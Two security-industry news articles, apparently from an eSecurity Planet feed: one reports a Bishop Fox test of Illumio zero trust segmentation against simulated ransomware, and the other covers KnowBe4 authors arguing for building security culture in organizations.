The attack simulations where no ZTS was deployed breached and compromised the system in 2.5 hours. On the other hand, in the simulation with full app ring-fencing policies enforced, the attack was detected and stopped in just 10 minutes.

“ZTS can be used in a proactive fashion to ring-fence entire environments and applications, drastically reducing the pathways available for exploit through lateral movement,” Bishop Fox said.

The other two simulation scenarios also showed that the zero trust protections were superior. Attacks simulated with preconfigured static protection were stopped in 24 minutes, and those with detection and response were blocked in 38 minutes.

“If an organization chooses to invest in zero-trust strategies, including zero trust segmentation, it will find that, compared to an environment that simply implements a detection and response approach, the organization is four times faster to contain a bad actor and minimize the impact of a breach,” said Raghu Nandakumara, head of industry solutions at Illumio.

The report also found that ZTS can play a critical role in covering endpoint detection and response (EDR) blind spots. EDR gains visibility on what’s happening on an organization’s endpoints by capturing activity data. However, organizations are learning the hard way that cyber criminals commonly use EDR blind spots.

Bishop Fox’s report assures that in terms of data collection, they found Illumio’s telemetry to be especially useful to cover some EDR blind spots, where the preconfigured EDR alerts did not properly detect attacker activities.

“In a particular scenario where the red team performed more evasive maneuvers, Bishop Fox properly identified a suspicious traffic pattern using Illumio’s telemetry combined with EDR alerts,” Bishop Fox said.

Also read: Why You Need to Tune EDR to Secure Your Environment

Ransomware: Breach and Attack Simulations

To assess Illumio ZTS, Bishop Fox’s assessment team chose an infrastructure-as-code solution. The environment was based on the Splunk Attack Range open-source project but modified to include more hosts and to deploy a more complete Active Directory configuration.

The test environment was made of the following resources:

• Five Windows Server 2019 instances representing hosts in a corporate network
• Five Windows Server 2019 instances representing hosts in a staging network
• Five Windows Server 2019 instances representing hosts in a production network
• One Windows Server 2019 acting as a domain controller
• One Ubuntu 18.04 server running a Splunk server

All Windows instances ran a Splunk Universal Forwarder agent and a System Monitor (Sysmon) service configured with the default Splunk Attack range configuration. These instances were also deployed with the default configuration of Nextron Systems’ Aurora EDR agent, including the default set of Sigma rules.

All Windows hosts had the following remote administrative services enabled:

• Windows Remote Management (WinRM)
• Remote Desktop Protocol (RDP)

The Illumio VEN agent was installed during instance provisioning on top of that configuration.

The Bishop Fox team based their attack techniques on real-world attacks, creating playbooks from active known ransomware threats groups such as Conti. The attack aimed to identify available assets, execute lateral movement, and escalate privileges within the system to finally deploy the ransomware across the domain-joined systems.

Full Application Ring-fencing Attack Simulation

The fourth scenario — full ring attack simulation — showed the most effective results in time to identify and stop a ransomware attack, accomplishing these milestones in just 10 minutes.

In the scenario used, the microsegmentation policy consisted of the following rules:

• Database workloads in one environment could not connect to other environments.
• API workloads in one environment could not connect to other environments.
• The Jump host workload from the Corporate environment could access every host in the Staging environment using RDP.
• The Jump host workload from the Staging environment could access every host in the Production environment using RDP.
• Every workload could communicate with the domain controller.
• Every workload could access public SMB shares in all environments.
• Every workload could communicate to the internet on the following ports:
  • 443/TCP
  • 80/TCP
  • 53/TCP
  • 53/UDP
  • 123/UDP
• RDP access was authorized from the internet to API workloads in the Corporate network as an entry point for the attacker.

The red team, simulating the attack, started by connecting to corp-win-serv-0 using the CORPADMIN account. The team then uploaded a Sliver agent to C:\ProgramData\Amazon and executed it. Once Microsoft Defender detected the initial payload, the team modified Defender to allow the binary and re-executed the payload.

“After waiting several minutes for a C2 callback and fallback connection methods to execute, the red team still had no established session with the Silver agent, indicating additional segmentation had been enforced,” the report explained.

The red team followed methodology without a C2 agent and began local host enumeration using a Windows command prompt to enumerate running processes, as shown below.

The team continued the discovery process and identified the password policies in place, along with local user accounts on the machine, before losing the RDP session due to blue team countermeasures. The entire simulation ended 10 minutes after it started.

The Importance of Real Threat Simulations

The Bishop Fox assessment of Illumio revealed in detail how running simulation attacks can enlighten the industry on the capabilities of zero trust segmentation.

However, the assessment did have some limitations:

• The number of and style of attacks evaluated was limited.
• Technical settings and rules of attacks, environment, and microsegmentation policies.
• The environment representing hosts was a Windows-only environment.
• Only two Bishop Fox consultants engaged in the simulations: One acting as the attacker (red team) and the other acting as the security team defending the system (blue team).

Despite these limitations, the assessment is a big step in the right direction. Putting zero-trust security to the test with real attack simulations is often considered the ultimate cybersecurity defense.

These simulations can help organizations stay one step ahead of cyber criminals. Running simulated attacks can level-up security as malware evolves and the attack surface expands with the never-ending digital transformation.

Read next: Zero Trust: Hype vs. Reality

The post Zero Trust Speeds Ransomware Response, Illumio-Bishop Fox Test Finds appeared first on eSecurity Planet.

In September 2021, Cybersecurity Ventures anticipated in a report that the total global cybersecurity spending would exceed a staggering $1.75 trillion by 2025. The report projected another year of growth in investment for the sector, this time at 15%.

Companies continue to invest in protecting their increasingly digitalized business assets. From Internet of Things (IoT) devices to the cloud and hybrid work endpoints, cybersecurity spending has also grown and shifted since COVID-19 changed the way the world works.

“In 2004, the global cybersecurity market was worth just $3.5 billion,” said Steve Morgan, founder of Cybersecurity Ventures. “Now it’s one of the largest and fastest-growing sectors in the information economy.”

Security executives have been adding features focusing on zero-trust technology, automation, responsive SOAR platforms, secure access service edge (SASE) models, and deception technology, among others.

But that technology can at best limit damage if the human element doesn’t improve.

Also read: Best Cybersecurity Awareness Training for Employees

The Key to Cyber Defense is Security Culture

PwC’s 2022 Global Digital Trust Insights report reveals that the spending trend for cybersecurity shows no signs of slowing down. In fact, 69% of surveyed organizations predict an increase in their security spending for 2022.

But two veteran security experts, Peter Carpenter and Kai Roer, at employee cybersecurity training leader KnowBe4 say business leaders are overlooking a hacker’s primary way into a system: vulnerable and exploitable human workers. They say that the best defense against cyber threats is in an organization’s security culture.

Their latest book, The Security Culture Playbook: An Executive Guide to Reducing Risk and Developing Your Human Defense Layer, combines the insight of 35 years of security culture experience with data-driven insights from over 40,000 global organizations. They believe that promoting security awareness isn’t enough; organizations must “bake security into their culture.”

Carpenter spoke to eSecurity Planet about the importance of a strong security culture. Carpenter said organizations have become experts in technology-based security tactics such as firewalls, email gateways, endpoint protection, and more. However, despite advanced defenses, organizations still face massive data breach problems.

“Technology-based defenses have made it so difficult to hack into organizations that cybercriminals are increasingly turning to social engineering (tricking humans) to accomplish their goals,” Carpenter said.

The industry has to direct as much effort into preparing human-based defenses as they have their technology defenses. Carpenter’s recommendation is to put more intentional time, effort, and investment into building this layer of defense.

“This means focusing on our cybersecurity ABCs: awareness, behavior, and culture,” Carpenter said.

Improving Cybersecurity Communication and Metrics

Carpenter revealed a simple formula that describes the basic flow of executive communication and is designed to improve every cybersecurity message. It all starts with the information that creates a narrative or story. The story is vital for workers to identify with the issues. This way they will remember concepts better.

“The person sharing information needs to find ways to connect the information to something bigger, broader, and more emotional than simple facts and figures,” Carpenter said.

The formula is:

Information ? Story/Narrative ? Transparency and Metrics ? Insight and Direction.

In this formula, facts, figures, and supporting details should only be introduced in ways that support the broader story. It is also of vital importance, when introducing metrics, to interpret them transparently, clearly, and honestly. Metrics in cybersecurity and security culture can be victories, stumbling blocks, or challenges that move the story from one point of the plot to another. This is where insight and direction come into play.

Measuring the security culture of an organization is increasingly important to gain a 360-vision into the company’s strong and weak points. Carpenter’s method to gauge a security culture goes well beyond others, measuring seven dimensions through technical and scientific approaches.

“We break security culture into seven distinct, measurable dimensions. They are: attitudes, behaviors, cognition, communication, compliance, norms, and responsibilities,” Carpenter explained.

Each one of the dimensions can be measured by direct observation or by looking at evidence or data. One of the methods used is their proprietary Security Culture Survey. The survey includes a set of scientifically based questions that are designed to get to the heart of each of the seven dimensions.

“One of the secrets to getting accurate answers in a survey like this is that we don’t ask someone what their specific behavior or understanding is; instead, we ask them how they perceive other people or groups in their organization,” Carpenter said, adding that such indirect questions invite greater honesty.

The benefit of measuring the security culture of an organization in seven dimensions is it provides a much more detailed view of the issues that need to be addressed. Additionally, each dimension has a gravitational effect on the others. If an organization focuses on improving one or two dimensions, the others are expected to improve as well.

Protecting Your Data Through a Strong Security Culture

For years, technology-based tactics have been preached as the ultimate defense against cyberattacks. However, a Verizon report reveals that 82% of all breaches are linked to the human element. Organizations will continue to be exposed to attacks—no matter how strong their cyber defenses are—because sophisticated cyber criminals today are targeting the weakest links of a system: its workforce. These weak links can only be strengthened by strengthening the security culture.

Read next: Top Cybersecurity Companies for 2022

We may be compensated by affiliate links or sponsored partnerships that appear on this page, but any affiliation has no influence on our editorial content. For more info, visit our Terms of Use page.

The post Cybersecurity Training and Tech Aren’t Enough; ‘Culture Change’ Needed appeared first on eSecurity Planet.